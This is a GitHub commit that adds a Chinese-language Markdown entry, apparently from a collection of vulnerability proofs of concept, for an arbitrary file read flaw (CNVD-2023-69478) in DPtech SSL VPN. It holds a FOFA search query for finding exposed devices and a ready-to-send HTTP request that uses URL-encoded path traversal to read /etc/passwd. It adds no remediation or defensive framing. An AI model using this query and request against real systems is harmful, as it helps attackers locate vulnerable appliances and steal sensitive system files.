Create 迪普DPTech VPN 任意文件读取.md

This commit is contained in:
wy876 2023-11-16 19:15:20 +08:00 committed by GitHub
parent 179931864b
commit 6fd3903ba9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,23 @@
## 迪普DPTech VPN 任意文件读取 CNVD-2023-69478
杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞攻击者可利用该漏洞获敏感信息。
## 漏洞影响产品
杭州迪普科技股份有限公司DPtech SSL VPN
## fofa
```
title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"
```
## poc
```
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: xxxxxxxxx
Cookie: SSLVPN_lang=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
se
```
## 漏洞复现
![](./assets/780475ed2a4b528fe68184a4f665a7d1fe08f3.png)
![](./assets/7171140331ad9063b8e9a92e8161c325c0b418.png)